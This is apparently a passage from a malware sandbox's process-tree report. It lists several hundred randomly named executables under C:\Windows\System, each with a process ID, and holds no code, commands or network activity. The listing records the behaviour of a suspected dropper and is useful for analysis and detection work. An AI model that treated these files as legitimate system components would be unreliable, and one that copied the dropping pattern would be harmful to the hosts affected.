- C:\Windows\System\ppqzPDk.exe
  C:\Windows\System\ppqzPDk.exe
  2⤵
  PID:4428
- C:\Windows\System\yqkCWIP.exe
  C:\Windows\System\yqkCWIP.exe
  2⤵
  PID:7568
- C:\Windows\System\hOrVGVQ.exe
  C:\Windows\System\hOrVGVQ.exe
  2⤵
  PID:4464
- C:\Windows\System\JyCYJZT.exe
  C:\Windows\System\JyCYJZT.exe
  2⤵
  PID:7908
- C:\Windows\System\Pbtmqvy.exe
  C:\Windows\System\Pbtmqvy.exe
  2⤵
  PID:8124
- C:\Windows\System\JdITKeG.exe
  C:\Windows\System\JdITKeG.exe
  2⤵
  PID:7312
- C:\Windows\System\sSSsIyY.exe
  C:\Windows\System\sSSsIyY.exe
  2⤵
  PID:2388
- C:\Windows\System\iMKVwKV.exe
  C:\Windows\System\iMKVwKV.exe
  2⤵
  PID:7656
- C:\Windows\System\cvTiBCB.exe
  C:\Windows\System\cvTiBCB.exe
  2⤵
  PID:7344
- C:\Windows\System\tqOJfLX.exe
  C:\Windows\System\tqOJfLX.exe
  2⤵
  PID:8216
- C:\Windows\System\mCHhDJj.exe
  C:\Windows\System\mCHhDJj.exe
  2⤵
  PID:8256
- C:\Windows\System\apIlkFa.exe
  C:\Windows\System\apIlkFa.exe
  2⤵
  PID:8292
- C:\Windows\System\zulvoPH.exe
  C:\Windows\System\zulvoPH.exe
  2⤵
  PID:8372
- C:\Windows\System\AvZEYpQ.exe
  C:\Windows\System\AvZEYpQ.exe
  2⤵
  PID:8424
- C:\Windows\System\WOgApnu.exe
  C:\Windows\System\WOgApnu.exe
  2⤵
  PID:8464
- C:\Windows\System\vMzGIhq.exe
  C:\Windows\System\vMzGIhq.exe
  2⤵
  PID:8500
- C:\Windows\System\rRbqaBD.exe
  C:\Windows\System\rRbqaBD.exe
  2⤵
  PID:8568
- C:\Windows\System\lZoMeDK.exe
  C:\Windows\System\lZoMeDK.exe
  2⤵
  PID:8620
- C:\Windows\System\wCJPZUl.exe
  C:\Windows\System\wCJPZUl.exe
  2⤵
  PID:8672
- C:\Windows\System\XzIpCAZ.exe
  C:\Windows\System\XzIpCAZ.exe
  2⤵
  PID:8700
- C:\Windows\System\BuEZUud.exe
  C:\Windows\System\BuEZUud.exe
  2⤵
  PID:8716
- C:\Windows\System\ujjVlYT.exe
  C:\Windows\System\ujjVlYT.exe
  2⤵
  PID:8760
- C:\Windows\System\FXPpLhs.exe
  C:\Windows\System\FXPpLhs.exe
  2⤵
  PID:8808
- C:\Windows\System\gGYZWiN.exe
  C:\Windows\System\gGYZWiN.exe
  2⤵
  PID:8832
- C:\Windows\System\UxEvsLa.exe
  C:\Windows\System\UxEvsLa.exe
  2⤵
  PID:8900
- C:\Windows\System\byuilZd.exe
  C:\Windows\System\byuilZd.exe
  2⤵
  PID:8964
- C:\Windows\System\VzzBegG.exe
  C:\Windows\System\VzzBegG.exe
  2⤵
  PID:9004
- C:\Windows\System\rDZGmlL.exe
  C:\Windows\System\rDZGmlL.exe
  2⤵
  PID:9032
- C:\Windows\System\nuSTnmo.exe
  C:\Windows\System\nuSTnmo.exe
  2⤵
  PID:9084
- C:\Windows\System\FcrSOvX.exe
  C:\Windows\System\FcrSOvX.exe
  2⤵
  PID:9136
- C:\Windows\System\cylzNXa.exe
  C:\Windows\System\cylzNXa.exe
  2⤵
  PID:9188
- C:\Windows\System\zVgrSEO.exe
  C:\Windows\System\zVgrSEO.exe
  2⤵
  PID:8204
- C:\Windows\System\tMGcHkk.exe
  C:\Windows\System\tMGcHkk.exe
  2⤵
  PID:8240
- C:\Windows\System\fKAHGBb.exe
  C:\Windows\System\fKAHGBb.exe
  2⤵
  PID:8328
- C:\Windows\System\VGtEUsz.exe
  C:\Windows\System\VGtEUsz.exe
  2⤵
  PID:8404
- C:\Windows\System\HKAsnFa.exe
  C:\Windows\System\HKAsnFa.exe
  2⤵
  PID:8440
- C:\Windows\System\UEbYkhG.exe
  C:\Windows\System\UEbYkhG.exe
  2⤵
  PID:8484
- C:\Windows\System\DMyEWNk.exe
  C:\Windows\System\DMyEWNk.exe
  2⤵
  PID:8536
- C:\Windows\System\vdNfEQH.exe
  C:\Windows\System\vdNfEQH.exe
  2⤵
  PID:8600
- C:\Windows\System\PZKNGdd.exe
  C:\Windows\System\PZKNGdd.exe
  2⤵
  PID:8604
- C:\Windows\System\tvJlqck.exe
  C:\Windows\System\tvJlqck.exe
  2⤵
  PID:8608
- C:\Windows\System\iKWWuLP.exe
  C:\Windows\System\iKWWuLP.exe
  2⤵
  PID:8732
- C:\Windows\System\WfUxQUS.exe
  C:\Windows\System\WfUxQUS.exe
  2⤵
  PID:8772
- C:\Windows\System\geHNwrH.exe
  C:\Windows\System\geHNwrH.exe
  2⤵
  PID:8868
- C:\Windows\System\LPgTiri.exe
  C:\Windows\System\LPgTiri.exe
  2⤵
  PID:8896
- C:\Windows\System\sDimvHm.exe
  C:\Windows\System\sDimvHm.exe
  2⤵
  PID:8980
- C:\Windows\System\wqreSMJ.exe
  C:\Windows\System\wqreSMJ.exe
  2⤵
  PID:9024
- C:\Windows\System\kLdfeia.exe
  C:\Windows\System\kLdfeia.exe
  2⤵
  PID:9068
- C:\Windows\System\SAutemZ.exe
  C:\Windows\System\SAutemZ.exe
  2⤵
  PID:9096
- C:\Windows\System\Mcgndzo.exe
  C:\Windows\System\Mcgndzo.exe
  2⤵
  PID:9108
- C:\Windows\System\ZwoJoLD.exe
  C:\Windows\System\ZwoJoLD.exe
  2⤵
  PID:9100
- C:\Windows\System\KsRUBsA.exe
  C:\Windows\System\KsRUBsA.exe
  2⤵
  PID:9200
- C:\Windows\System\RCouSyt.exe
  C:\Windows\System\RCouSyt.exe
  2⤵
  PID:8228
- C:\Windows\System\sLwPyBi.exe
  C:\Windows\System\sLwPyBi.exe
  2⤵
  PID:8280
- C:\Windows\System\badfvaq.exe
  C:\Windows\System\badfvaq.exe
  2⤵
  PID:8396
- C:\Windows\System\qQVXuqh.exe
  C:\Windows\System\qQVXuqh.exe
  2⤵
  PID:8592
- C:\Windows\System\ycXnPIR.exe
  C:\Windows\System\ycXnPIR.exe
  2⤵
  PID:8652
- C:\Windows\System\QYvlDKz.exe
  C:\Windows\System\QYvlDKz.exe
  2⤵
  PID:8852
- C:\Windows\System\DXlCxJs.exe
  C:\Windows\System\DXlCxJs.exe
  2⤵
  PID:8912
- C:\Windows\System\vuLYwZC.exe
  C:\Windows\System\vuLYwZC.exe
  2⤵
  PID:8976
- C:\Windows\System\SbqfCBT.exe
  C:\Windows\System\SbqfCBT.exe
  2⤵
  PID:3788
- C:\Windows\System\JOPbBCe.exe
  C:\Windows\System\JOPbBCe.exe
  2⤵
  PID:8196
- C:\Windows\System\yuqZfEG.exe
  C:\Windows\System\yuqZfEG.exe
  2⤵
  PID:9212
- C:\Windows\System\MNpDrGw.exe
  C:\Windows\System\MNpDrGw.exe
  2⤵
  PID:8324
- C:\Windows\System\vmbKOcz.exe
  C:\Windows\System\vmbKOcz.exe
  2⤵
  PID:8488
- C:\Windows\System\yLeyKah.exe
  C:\Windows\System\yLeyKah.exe
  2⤵
  PID:8828
- C:\Windows\System\AeSCFNl.exe
  C:\Windows\System\AeSCFNl.exe
  2⤵
  PID:8288
- C:\Windows\System\MYOrtJj.exe
  C:\Windows\System\MYOrtJj.exe
  2⤵
  PID:9124
- C:\Windows\System\XDcCdzM.exe
  C:\Windows\System\XDcCdzM.exe
  2⤵
  PID:8816
- C:\Windows\System\zvyaulA.exe
  C:\Windows\System\zvyaulA.exe
  2⤵
  PID:8932
- C:\Windows\System\pJRpAeZ.exe
  C:\Windows\System\pJRpAeZ.exe
  2⤵
  PID:9180
- C:\Windows\System\gRoOHKV.exe
  C:\Windows\System\gRoOHKV.exe
  2⤵
  PID:8856
- C:\Windows\System\QlMVGKt.exe
  C:\Windows\System\QlMVGKt.exe
  2⤵
  PID:8752
- C:\Windows\System\wCOOXIn.exe
  C:\Windows\System\wCOOXIn.exe
  2⤵
  PID:9236
- C:\Windows\System\OMITbBp.exe
  C:\Windows\System\OMITbBp.exe
  2⤵
  PID:9272
- C:\Windows\System\qwtyVeo.exe
  C:\Windows\System\qwtyVeo.exe
  2⤵
  PID:9304
- C:\Windows\System\YZErPpk.exe
  C:\Windows\System\YZErPpk.exe
  2⤵
  PID:9348
- C:\Windows\System\OZANZWx.exe
  C:\Windows\System\OZANZWx.exe
  2⤵
  PID:9380
- C:\Windows\System\ccIxTmj.exe
  C:\Windows\System\ccIxTmj.exe
  2⤵
  PID:9396
- C:\Windows\System\oaiTUml.exe
  C:\Windows\System\oaiTUml.exe
  2⤵
  PID:9440
- C:\Windows\System\HolmQno.exe
  C:\Windows\System\HolmQno.exe
  2⤵
  PID:9468
- C:\Windows\System\PujDxwy.exe
  C:\Windows\System\PujDxwy.exe
  2⤵
  PID:9504
- C:\Windows\System\rWWjVOe.exe
  C:\Windows\System\rWWjVOe.exe
  2⤵
  PID:9532
- C:\Windows\System\SIwNjux.exe
  C:\Windows\System\SIwNjux.exe
  2⤵
  PID:9560
- C:\Windows\System\nqQgKlK.exe
  C:\Windows\System\nqQgKlK.exe
  2⤵
  PID:9588
- C:\Windows\System\CMVlkbG.exe
  C:\Windows\System\CMVlkbG.exe
  2⤵
  PID:9612
- C:\Windows\System\xsoSvlo.exe
  C:\Windows\System\xsoSvlo.exe
  2⤵
  PID:9632
- C:\Windows\System\ePCQrFZ.exe
  C:\Windows\System\ePCQrFZ.exe
  2⤵
  PID:9676
- C:\Windows\System\woEpOMv.exe
  C:\Windows\System\woEpOMv.exe
  2⤵
  PID:9700
- C:\Windows\System\QdzrBTR.exe
  C:\Windows\System\QdzrBTR.exe
  2⤵
  PID:9724
- C:\Windows\System\WmUrfAc.exe
  C:\Windows\System\WmUrfAc.exe
  2⤵
  PID:9752
- C:\Windows\System\NybRNJH.exe
  C:\Windows\System\NybRNJH.exe
  2⤵
  PID:9800
- C:\Windows\System\uMOxduG.exe
  C:\Windows\System\uMOxduG.exe
  2⤵
  PID:9832
- C:\Windows\System\kDingUd.exe
  C:\Windows\System\kDingUd.exe
  2⤵
  PID:9852
- C:\Windows\System\KrItbQD.exe
  C:\Windows\System\KrItbQD.exe
  2⤵
  PID:9884
- C:\Windows\System\uwQnDJD.exe
  C:\Windows\System\uwQnDJD.exe
  2⤵
  PID:9912
- C:\Windows\System\JkguxxQ.exe
  C:\Windows\System\JkguxxQ.exe
  2⤵
  PID:9940
- C:\Windows\System\pJSBlaa.exe
  C:\Windows\System\pJSBlaa.exe
  2⤵
  PID:9984
- C:\Windows\System\xdoJWbe.exe
  C:\Windows\System\xdoJWbe.exe
  2⤵
  PID:10004
- C:\Windows\System\tUebKGc.exe
  C:\Windows\System\tUebKGc.exe
  2⤵
  PID:10052
- C:\Windows\System\zAPEaxe.exe
  C:\Windows\System\zAPEaxe.exe
  2⤵
  PID:10076
- C:\Windows\System\eOoydnj.exe
  C:\Windows\System\eOoydnj.exe
  2⤵
  PID:10100
- C:\Windows\System\JJXCGjV.exe
  C:\Windows\System\JJXCGjV.exe
  2⤵
  PID:10136
- C:\Windows\System\zNpdMFv.exe
  C:\Windows\System\zNpdMFv.exe
  2⤵
  PID:10164
- C:\Windows\System\MeAVwun.exe
  C:\Windows\System\MeAVwun.exe
  2⤵
  PID:10188
- C:\Windows\System\kCQXBMk.exe
  C:\Windows\System\kCQXBMk.exe
  2⤵
  PID:10204
- C:\Windows\System\BpjElhP.exe
  C:\Windows\System\BpjElhP.exe
  2⤵
  PID:10220
- C:\Windows\System\VKXtCCF.exe
  C:\Windows\System\VKXtCCF.exe
  2⤵
  PID:9284
- C:\Windows\System\cjClEzb.exe
  C:\Windows\System\cjClEzb.exe
  2⤵
  PID:9360
- C:\Windows\System\hVDBBGT.exe
  C:\Windows\System\hVDBBGT.exe
  2⤵
  PID:9428
- C:\Windows\System\ckcYoYM.exe
  C:\Windows\System\ckcYoYM.exe
  2⤵
  PID:9452
- C:\Windows\System\NmvZOIo.exe
  C:\Windows\System\NmvZOIo.exe
  2⤵
  PID:9556
- C:\Windows\System\kGNAbEP.exe
  C:\Windows\System\kGNAbEP.exe
  2⤵
  PID:9604
- C:\Windows\System\HiyTZSw.exe
  C:\Windows\System\HiyTZSw.exe
  2⤵
  PID:9692
- C:\Windows\System\GyxEPkd.exe
  C:\Windows\System\GyxEPkd.exe
  2⤵
  PID:9596
- C:\Windows\System\AUyVqeu.exe
  C:\Windows\System\AUyVqeu.exe
  2⤵
  PID:9792
- C:\Windows\System\PuKpoWM.exe
  C:\Windows\System\PuKpoWM.exe
  2⤵
  PID:9868
- C:\Windows\System\xvrCLEv.exe
  C:\Windows\System\xvrCLEv.exe
  2⤵
  PID:9936
- C:\Windows\System\cMaBZeH.exe
  C:\Windows\System\cMaBZeH.exe
  2⤵
  PID:10040
- C:\Windows\System\uYPxtBm.exe
  C:\Windows\System\uYPxtBm.exe
  2⤵
  PID:10096
- C:\Windows\System\aAFXKKx.exe
  C:\Windows\System\aAFXKKx.exe
  2⤵
  PID:10200
- C:\Windows\System\zjZaHkJ.exe
  C:\Windows\System\zjZaHkJ.exe
  2⤵
  PID:10216
- C:\Windows\System\fzQYYnm.exe
  C:\Windows\System\fzQYYnm.exe
  2⤵
  PID:9328
- C:\Windows\System\JioGcHy.exe
  C:\Windows\System\JioGcHy.exe
  2⤵
  PID:9460
- C:\Windows\System\BXNDxQJ.exe
  C:\Windows\System\BXNDxQJ.exe
  2⤵
  PID:9580
- C:\Windows\System\nhhNIkk.exe
  C:\Windows\System\nhhNIkk.exe
  2⤵
  PID:9844
- C:\Windows\System\zPvcdlJ.exe
  C:\Windows\System\zPvcdlJ.exe
  2⤵
  PID:9932
- C:\Windows\System\qRgsJED.exe
  C:\Windows\System\qRgsJED.exe
  2⤵
  PID:10000
- C:\Windows\System\ldOYYcU.exe
  C:\Windows\System\ldOYYcU.exe
  2⤵
  PID:10176
- C:\Windows\System\hffnWRo.exe
  C:\Windows\System\hffnWRo.exe
  2⤵
  PID:9376
- C:\Windows\System\CnlJSLJ.exe
  C:\Windows\System\CnlJSLJ.exe
  2⤵
  PID:9780
- C:\Windows\System\tBYPcTj.exe
  C:\Windows\System\tBYPcTj.exe
  2⤵
  PID:9964
- C:\Windows\System\lGlmAgX.exe
  C:\Windows\System\lGlmAgX.exe
  2⤵
  PID:9668
- C:\Windows\System\gLQHYvQ.exe
  C:\Windows\System\gLQHYvQ.exe
  2⤵
  PID:9552
- C:\Windows\System\LnaWzYL.exe
  C:\Windows\System\LnaWzYL.exe
  2⤵
  PID:9228
- C:\Windows\System\qLTNdSv.exe
  C:\Windows\System\qLTNdSv.exe
  2⤵
  PID:10032
- C:\Windows\System\bsJOFyD.exe
  C:\Windows\System\bsJOFyD.exe
  2⤵
  PID:10248
- C:\Windows\System\mhKSeib.exe
  C:\Windows\System\mhKSeib.exe
  2⤵
  PID:10280
- C:\Windows\System\NLpEEcJ.exe
  C:\Windows\System\NLpEEcJ.exe
  2⤵
  PID:10308
- C:\Windows\System\QKAwxEr.exe
  C:\Windows\System\QKAwxEr.exe
  2⤵
  PID:10336
- C:\Windows\System\mzprDdt.exe
  C:\Windows\System\mzprDdt.exe
  2⤵
  PID:10368
- C:\Windows\System\XAwBPWe.exe
  C:\Windows\System\XAwBPWe.exe
  2⤵
  PID:10388
- C:\Windows\System\oiuDNmY.exe
  C:\Windows\System\oiuDNmY.exe
  2⤵
  PID:10420
- C:\Windows\System\yJnlFWz.exe
  C:\Windows\System\yJnlFWz.exe
  2⤵
  PID:10456
- C:\Windows\System\PtNlwsH.exe
  C:\Windows\System\PtNlwsH.exe
  2⤵
  PID:10484
- C:\Windows\System\LKtZTZG.exe
  C:\Windows\System\LKtZTZG.exe
  2⤵
  PID:10528
- C:\Windows\System\NQNdiPt.exe
  C:\Windows\System\NQNdiPt.exe
  2⤵
  PID:10552
- C:\Windows\System\fASqjZh.exe
  C:\Windows\System\fASqjZh.exe
  2⤵
  PID:10580
- C:\Windows\System\rWUTDKv.exe
  C:\Windows\System\rWUTDKv.exe
  2⤵
  PID:10612
- C:\Windows\System\JGNmsBo.exe
  C:\Windows\System\JGNmsBo.exe
  2⤵
  PID:10640
- C:\Windows\System\XrQWXfJ.exe
  C:\Windows\System\XrQWXfJ.exe
  2⤵
  PID:10668
- C:\Windows\System\DCsysIT.exe
  C:\Windows\System\DCsysIT.exe
  2⤵
  PID:10696
- C:\Windows\System\MIGaPES.exe
  C:\Windows\System\MIGaPES.exe
  2⤵
  PID:10724
- C:\Windows\System\BjeFxCR.exe
  C:\Windows\System\BjeFxCR.exe
  2⤵
  PID:10752
- C:\Windows\System\WKyGiTd.exe
  C:\Windows\System\WKyGiTd.exe
  2⤵
  PID:10780
- C:\Windows\System\IPnxzlX.exe
  C:\Windows\System\IPnxzlX.exe
  2⤵
  PID:10808
- C:\Windows\System\FFQPqgo.exe
  C:\Windows\System\FFQPqgo.exe
  2⤵
  PID:10836
- C:\Windows\System\yAOiYYz.exe
  C:\Windows\System\yAOiYYz.exe
  2⤵
  PID:10864
- C:\Windows\System\qnCAqpJ.exe
  C:\Windows\System\qnCAqpJ.exe
  2⤵
  PID:10892
- C:\Windows\System\lwoCWMG.exe
  C:\Windows\System\lwoCWMG.exe
  2⤵
  PID:10924
- C:\Windows\System\lpyjepb.exe
  C:\Windows\System\lpyjepb.exe
  2⤵
  PID:10952
- C:\Windows\System\kHKAukh.exe
  C:\Windows\System\kHKAukh.exe
  2⤵
  PID:10980
- C:\Windows\System\SRgXdFj.exe
  C:\Windows\System\SRgXdFj.exe
  2⤵
  PID:11000
- C:\Windows\System\VcWzxkS.exe
  C:\Windows\System\VcWzxkS.exe
  2⤵
  PID:11024
- C:\Windows\System\vSCkNLU.exe
  C:\Windows\System\vSCkNLU.exe
  2⤵
  PID:11048
- C:\Windows\System\VEGeywh.exe
  C:\Windows\System\VEGeywh.exe
  2⤵
  PID:11088
- C:\Windows\System\MRPhQvX.exe
  C:\Windows\System\MRPhQvX.exe
  2⤵
  PID:11112
- C:\Windows\System\jpQyAAH.exe
  C:\Windows\System\jpQyAAH.exe
  2⤵
  PID:11140
- C:\Windows\System\PpzgscN.exe
  C:\Windows\System\PpzgscN.exe
  2⤵
  PID:11176
- C:\Windows\System\hNhEYez.exe
  C:\Windows\System\hNhEYez.exe
  2⤵
  PID:11196
- C:\Windows\System\wJbCgWm.exe
  C:\Windows\System\wJbCgWm.exe
  2⤵
  PID:11232
- C:\Windows\System\ouhBljN.exe
  C:\Windows\System\ouhBljN.exe
  2⤵
  PID:11248
- C:\Windows\System\vLTPtpR.exe
  C:\Windows\System\vLTPtpR.exe
  2⤵
  PID:10296
- C:\Windows\System\fpKxUof.exe
  C:\Windows\System\fpKxUof.exe
  2⤵
  PID:10332
- C:\Windows\System\fVgylxT.exe
  C:\Windows\System\fVgylxT.exe
  2⤵
  PID:10428
- C:\Windows\System\DZtMcGS.exe
  C:\Windows\System\DZtMcGS.exe
  2⤵
  PID:10468
- C:\Windows\System\uiNBmMY.exe
  C:\Windows\System\uiNBmMY.exe
  2⤵
  PID:10064
- C:\Windows\System\bMvQxyp.exe
  C:\Windows\System\bMvQxyp.exe
  2⤵
  PID:10544
- C:\Windows\System\iqslbVW.exe
  C:\Windows\System\iqslbVW.exe
  2⤵
  PID:10608
- C:\Windows\System\oPeJOml.exe
  C:\Windows\System\oPeJOml.exe
  2⤵
  PID:10736
- C:\Windows\System\uCmglfv.exe
  C:\Windows\System\uCmglfv.exe
  2⤵
  PID:10792
- C:\Windows\System\SvKunGG.exe
  C:\Windows\System\SvKunGG.exe
  2⤵
  PID:10876
- C:\Windows\System\iddZCuY.exe
  C:\Windows\System\iddZCuY.exe
  2⤵
  PID:10968
- C:\Windows\System\hZlKxLC.exe
  C:\Windows\System\hZlKxLC.exe
  2⤵
  PID:11012
- C:\Windows\System\aBRMrkn.exe
  C:\Windows\System\aBRMrkn.exe
  2⤵
  PID:11108
- C:\Windows\System\zJSIvIE.exe
  C:\Windows\System\zJSIvIE.exe
  2⤵
  PID:11136
- C:\Windows\System\DogdfUm.exe
  C:\Windows\System\DogdfUm.exe
  2⤵
  PID:11228
- C:\Windows\System\taPDUaf.exe
  C:\Windows\System\taPDUaf.exe
  2⤵
  PID:10272
- C:\Windows\System\SKvDsIg.exe
  C:\Windows\System\SKvDsIg.exe
  2⤵
  PID:10452
- C:\Windows\System\VmPqwWV.exe
  C:\Windows\System\VmPqwWV.exe
  2⤵
  PID:10476
- C:\Windows\System\OvKKYst.exe
  C:\Windows\System\OvKKYst.exe
  2⤵
  PID:10680
- C:\Windows\System\xWqgdNt.exe
  C:\Windows\System\xWqgdNt.exe
  2⤵
  PID:10988
- C:\Windows\System\DJZkTjA.exe
  C:\Windows\System\DJZkTjA.exe
  2⤵
  PID:11064
- C:\Windows\System\FjXLiKo.exe
  C:\Windows\System\FjXLiKo.exe
  2⤵
  PID:10288
- C:\Windows\System\cyRicQL.exe
  C:\Windows\System\cyRicQL.exe
  2⤵
  PID:10540
- C:\Windows\System\gRuaPuk.exe
  C:\Windows\System\gRuaPuk.exe
  2⤵
  PID:10760
- C:\Windows\System\ZENqCyD.exe
  C:\Windows\System\ZENqCyD.exe
  2⤵
  PID:11128
- C:\Windows\System\JgHbjrD.exe
  C:\Windows\System\JgHbjrD.exe
  2⤵
  PID:10852
- C:\Windows\System\nYWvrCF.exe
  C:\Windows\System\nYWvrCF.exe
  2⤵
  PID:10772
- C:\Windows\System\HzXartB.exe
  C:\Windows\System\HzXartB.exe
  2⤵
  PID:11280
- C:\Windows\System\FlrmpCR.exe
  C:\Windows\System\FlrmpCR.exe
  2⤵
  PID:11308
- C:\Windows\System\RwQzZpI.exe
  C:\Windows\System\RwQzZpI.exe
  2⤵
  PID:11324
- C:\Windows\System\MLsmMPI.exe
  C:\Windows\System\MLsmMPI.exe
  2⤵
  PID:11376
- C:\Windows\System\rgWKZnv.exe
  C:\Windows\System\rgWKZnv.exe
  2⤵
  PID:11404
- C:\Windows\System\uTqaRVz.exe
  C:\Windows\System\uTqaRVz.exe
  2⤵
  PID:11420
- C:\Windows\System\wAFXjKR.exe
  C:\Windows\System\wAFXjKR.exe
  2⤵
  PID:11472
- C:\Windows\System\xGPJxIG.exe
  C:\Windows\System\xGPJxIG.exe
  2⤵
  PID:11492
- C:\Windows\System\rRLCchc.exe
  C:\Windows\System\rRLCchc.exe
  2⤵
  PID:11532
- C:\Windows\System\GIdlRgZ.exe
  C:\Windows\System\GIdlRgZ.exe
  2⤵
  PID:11548
- C:\Windows\System\cFFMMQT.exe
  C:\Windows\System\cFFMMQT.exe
  2⤵
  PID:11576
- C:\Windows\System\bGoEhPX.exe
  C:\Windows\System\bGoEhPX.exe
  2⤵
  PID:11608
- C:\Windows\System\GTvTvhC.exe
  C:\Windows\System\GTvTvhC.exe
  2⤵
  PID:11652
- C:\Windows\System\NJVeQnM.exe
  C:\Windows\System\NJVeQnM.exe
  2⤵
  PID:11672
- C:\Windows\System\YaFGWfl.exe
  C:\Windows\System\YaFGWfl.exe
  2⤵
  PID:11720
- C:\Windows\System\WKuQuaj.exe
  C:\Windows\System\WKuQuaj.exe
  2⤵
  PID:11748
- C:\Windows\System\VpmBsxo.exe
  C:\Windows\System\VpmBsxo.exe
  2⤵
  PID:11792
- C:\Windows\System\MagFEnw.exe
  C:\Windows\System\MagFEnw.exe
  2⤵
  PID:11820
- C:\Windows\System\JEUvdma.exe
  C:\Windows\System\JEUvdma.exe
  2⤵
  PID:11848
- C:\Windows\System\aIIgPpZ.exe
  C:\Windows\System\aIIgPpZ.exe
  2⤵
  PID:11876
- C:\Windows\System\NsVhhqQ.exe
  C:\Windows\System\NsVhhqQ.exe
  2⤵
  PID:11904
- C:\Windows\System\fGNlbCr.exe
  C:\Windows\System\fGNlbCr.exe
  2⤵
  PID:11920
- C:\Windows\System\clbshLG.exe
  C:\Windows\System\clbshLG.exe
  2⤵
  PID:11960
- C:\Windows\System\oKHHDov.exe
  C:\Windows\System\oKHHDov.exe
  2⤵
  PID:11988
- C:\Windows\System\zylOCvD.exe
  C:\Windows\System\zylOCvD.exe
  2⤵
  PID:12016
- C:\Windows\System\sMBaggs.exe
  C:\Windows\System\sMBaggs.exe
  2⤵
  PID:12040
- C:\Windows\System\hzxSAnq.exe
  C:\Windows\System\hzxSAnq.exe
  2⤵
  PID:12072
- C:\Windows\System\GeEHbam.exe
  C:\Windows\System\GeEHbam.exe
  2⤵
  PID:12100
- C:\Windows\System\yoAiAgF.exe
  C:\Windows\System\yoAiAgF.exe
  2⤵
  PID:12128
- C:\Windows\System\VwzcHCh.exe
  C:\Windows\System\VwzcHCh.exe
  2⤵
  PID:12148
- C:\Windows\System\MbxNMEp.exe
  C:\Windows\System\MbxNMEp.exe
  2⤵
  PID:12184
- C:\Windows\System\VDeYdwi.exe
  C:\Windows\System\VDeYdwi.exe
  2⤵
  PID:12212
- C:\Windows\System\eboaKfh.exe
  C:\Windows\System\eboaKfh.exe
  2⤵
  PID:12240
- C:\Windows\System\mKbElwW.exe
  C:\Windows\System\mKbElwW.exe
  2⤵
  PID:12268
- C:\Windows\System\DXIZzeC.exe
  C:\Windows\System\DXIZzeC.exe
  2⤵
  PID:11276
- C:\Windows\System\TeLFkWR.exe
  C:\Windows\System\TeLFkWR.exe
  2⤵
  PID:11344
- C:\Windows\System\AEeYuNt.exe
  C:\Windows\System\AEeYuNt.exe
  2⤵
  PID:11416
- C:\Windows\System\sRaBREX.exe
  C:\Windows\System\sRaBREX.exe
  2⤵
  PID:11488
- C:\Windows\System\ESpoVJB.exe
  C:\Windows\System\ESpoVJB.exe
  2⤵
  PID:11544
- C:\Windows\System\zVOMCXI.exe
  C:\Windows\System\zVOMCXI.exe
  2⤵
  PID:11620
- C:\Windows\System\jqNKYmG.exe
  C:\Windows\System\jqNKYmG.exe
  2⤵
  PID:11680
- C:\Windows\System\nXJIiwv.exe
  C:\Windows\System\nXJIiwv.exe
  2⤵
  PID:11648
- C:\Windows\System\KQLtcsi.exe
  C:\Windows\System\KQLtcsi.exe
  2⤵
  PID:11816
- C:\Windows\System\SEXwEll.exe
  C:\Windows\System\SEXwEll.exe
  2⤵
  PID:11872
- C:\Windows\System\iqkWlCE.exe
  C:\Windows\System\iqkWlCE.exe
  2⤵
  PID:11972
- C:\Windows\System\CMRHOtn.exe
  C:\Windows\System\CMRHOtn.exe
  2⤵
  PID:12048
- C:\Windows\System\GFzlnLI.exe
  C:\Windows\System\GFzlnLI.exe
  2⤵
  PID:12092
- C:\Windows\System\fizoDsK.exe
  C:\Windows\System\fizoDsK.exe
  2⤵
  PID:12168
- C:\Windows\System\VHgIrYc.exe
  C:\Windows\System\VHgIrYc.exe
  2⤵
  PID:12224
- C:\Windows\System\ynBseIV.exe
  C:\Windows\System\ynBseIV.exe
  2⤵
  PID:12260
- C:\Windows\System\KBpGfRP.exe
  C:\Windows\System\KBpGfRP.exe
  2⤵
  PID:11388
- C:\Windows\System\SqRIlPR.exe
  C:\Windows\System\SqRIlPR.exe
  2⤵
  PID:11448
- C:\Windows\System\rMtZkCA.exe
  C:\Windows\System\rMtZkCA.exe
  2⤵
  PID:11596
- C:\Windows\System\MkvfGlz.exe
  C:\Windows\System\MkvfGlz.exe
  2⤵
  PID:11732
- C:\Windows\System\nRSUzrc.exe
  C:\Windows\System\nRSUzrc.exe
  2⤵
  PID:11868
- C:\Windows\System\PpgFdrx.exe
  C:\Windows\System\PpgFdrx.exe
  2⤵
  PID:12000
- C:\Windows\System\CIudGVa.exe
  C:\Windows\System\CIudGVa.exe
  2⤵
  PID:12200
- C:\Windows\System\QWcuAWb.exe
  C:\Windows\System\QWcuAWb.exe
  2⤵
  PID:1856
- C:\Windows\System\rdtYtrx.exe
  C:\Windows\System\rdtYtrx.exe
  2⤵
  PID:11668
- C:\Windows\System\SJtWUlc.exe
  C:\Windows\System\SJtWUlc.exe
  2⤵
  PID:12252
- C:\Windows\System\gAuSVGW.exe
  C:\Windows\System\gAuSVGW.exe
  2⤵
  PID:11956
- C:\Windows\System\SlIWDyT.exe
  C:\Windows\System\SlIWDyT.exe
  2⤵
  PID:12324
- C:\Windows\System\VeqQtXV.exe
  C:\Windows\System\VeqQtXV.exe
  2⤵
  PID:12376
- C:\Windows\System\dEcUqWZ.exe
  C:\Windows\System\dEcUqWZ.exe
  2⤵
  PID:12408
- C:\Windows\System\cHrVMrU.exe
  C:\Windows\System\cHrVMrU.exe
  2⤵
  PID:12428
- C:\Windows\System\kitjLsk.exe
  C:\Windows\System\kitjLsk.exe
  2⤵
  PID:12452
- C:\Windows\System\eZtIfFV.exe
  C:\Windows\System\eZtIfFV.exe
  2⤵
  PID:12480
- C:\Windows\System\GsKrNFp.exe
  C:\Windows\System\GsKrNFp.exe
  2⤵
  PID:12544
- C:\Windows\System\JczklXL.exe
  C:\Windows\System\JczklXL.exe
  2⤵
  PID:12568
- C:\Windows\System\YPIjAeJ.exe
  C:\Windows\System\YPIjAeJ.exe
  2⤵
  PID:12600
- C:\Windows\System\heibNgP.exe
  C:\Windows\System\heibNgP.exe
  2⤵
  PID:12648
- C:\Windows\System\kebfaHs.exe
  C:\Windows\System\kebfaHs.exe
  2⤵
  PID:12692
- C:\Windows\System\EjBVYfk.exe
  C:\Windows\System\EjBVYfk.exe
  2⤵
  PID:12712
- C:\Windows\System\pnSHMIp.exe
  C:\Windows\System\pnSHMIp.exe
  2⤵
  PID:12756
- C:\Windows\System\DLcaVkF.exe
  C:\Windows\System\DLcaVkF.exe
  2⤵
  PID:12776
- C:\Windows\System\ZaPipmr.exe
  C:\Windows\System\ZaPipmr.exe
  2⤵
  PID:12800
